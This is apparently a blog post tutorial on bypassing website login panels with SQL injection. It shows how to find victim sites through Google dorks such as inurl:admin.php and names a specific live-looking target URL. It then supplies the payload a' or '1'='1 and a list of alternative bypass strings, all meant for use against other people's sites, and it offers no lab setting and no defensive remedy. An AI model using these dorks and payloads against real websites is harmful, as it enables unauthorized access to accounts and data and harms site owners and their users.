!! FOR EDUCATION PURPOSES ONLY !!
I Introduction
Today i'm gonna teach you how to bypass the login panel using SQL Injection.
II Learning Basics
1) Google Dorks
what is google dorks? Google dorks are used for easier searching like "inurl" "intext" like that
why do we need that?
No we really dont need that, Just kidding ofcourse we need that to get target websites!
how do we use it?
so for example go to google and search: " inurl:login.php "
you'll see the results like www.website.com/login.php
2)SQL
Structured Query Language(SQL) is a special-purpose programming language designed for managing data held in a relational database management system.
Reference? ofcourse wikipedia
3)SQL injection
SQL injection is kind of attack that has malicious code inserted into sql statements to drop,update,add,view etc a database
III Finding target
After learning some basics, we will now get a target using google dorks,
Examples of google dorks:
inurl:login.php
inurl:admin.php
inurl:administrator.php
inurl:admin_login.php
IV Bypass Login
So after fnding a target, we will now try to bypass it
example this is our target
http://www.voteforgoodleader.com/h/launch.php?m=home&sm=acc&l=en
Try logging in using " a' or '1'='1 " (without quotes) for password and email.
And bam! we successfully bypassed the login!
Why?
Example this is the query
select username,pass from users where username='a' or '1'='1' and password='a' or '1'='1' limit 0,1;
the or '1'='1' will make the statement true no matter what.
V Extras
If the " a' or '1'='1 " didin't work you can use some of this
a' or true--
a' or 1=1--
a') or true--
a' or 1=1#
a) or ('')=('
VI Goodbye
That's all for now hope you enjoyed my tutorial! If you have some feedbacks or question please feel free to comment.
No comments:
Post a Comment